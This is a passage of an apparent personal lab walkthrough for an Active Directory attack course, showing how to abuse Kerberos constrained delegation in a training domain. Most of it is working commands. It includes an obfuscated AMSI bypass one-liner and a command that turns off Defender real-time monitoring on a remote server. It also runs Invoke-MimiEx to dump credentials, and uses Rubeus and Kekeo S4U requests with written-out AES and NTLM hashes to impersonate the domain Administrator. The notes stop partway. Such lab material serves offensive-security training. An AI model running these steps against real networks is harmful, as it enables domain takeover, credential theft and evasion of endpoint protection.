👨‍✈️Exploit Constrained Delegation and execute privileged operations

We are going to start bu enumerating users with constrained delegation ->

S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )
. C:\AD\Tools\PowerView.ps1
Get-DomainUser -TrustedToAuth

We can either use Kekeo or Rubeus to abuse that.

Let's start with rubeus -> First we need to encode "s4u" with Argsplit

Since i'm not very meticulous, i didn't note websvc's secrets so i need to do it again ->

PS C:\AD\Tools> S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )
PS C:\AD\Tools> . .\PowerView.ps1
PS C:\AD\Tools> . .\PowerUp.ps1
PS C:\AD\Tools> Copy-Item C:\AD\Tools\Invoke-MimiEx.ps1 \\dcorp-adminsrv.dollarcorp.moneycorp.local\c$\'Program Files'
PS C:\AD\Tools> Copy-Item C:\AD\Tools\Invoke-MimiEx.ps1 \\dcorp-adminsrv.dollarcorp.moneycorp.local\c$\'Program Files'
PS C:\AD\Tools> Enter-PSSession dcorp-adminsrv
[dcorp-adminsrv]: PS C:\Users\student613\Documents> Set-MpPreference -DisableRealtimeMonitoring $true -Verbose
VERBOSE: Performing operation 'Update MSFT_MpPreference' on Target 'ProtectionManagement'.
[dcorp-adminsrv]: PS C:\Users\student613\Documents> cd 'C:\Program Files\'
[dcorp-adminsrv]: PS C:\Program Files> .\Invoke-MimiEx.ps1

Now let's launch the Rubeus with s4u encoded:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /user:websvc /aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7 /impersonateuser:Administrator /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL" /ptt

in the course there's an error on the server name that is dcorpmssql and not dcorp-mssql

And now we can access dcorp-mssql:

Now we're going to abuse Constrained Delegation using websvc with Kekeo

Let's use the tgt::ask module from kekeo to request a TGT from websvc. Note that we are using NTLM hash of websvcs here just to show NTLM hash can be used too:

cd .\kekeo\x64
.\kekeo.exe 
tgt::ask /user:websvc /domain:dollarcorp.moneycorp.local /rc4:cc098f204c5887eaa8253e7c2749156f

Now, let's use this TGT and request a TGS. Note that we are requesting a TGS to access cifs/dcorp-mssql as the domain administrator - Administrator ->

tgs::s4u /tgt:TGT_websvc@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:cifs/dcorp-mssql.dollarcorp.moneycorp.LOCAL

Now we can inject the ticket in current session to use it

(will finish kekeo later)

Now we're going to abuse Constrained Delegation using dcorp-adminsrv with Rubeus

We have the AES keys of dcorp-adminsrv$ from dcorp-adminsrv machine

PreviousUnconstrained Delegation to DA to Entreprise Admin through printer bugNextFind Computer in domain with Write permissions and access as Domain Admin

Last updated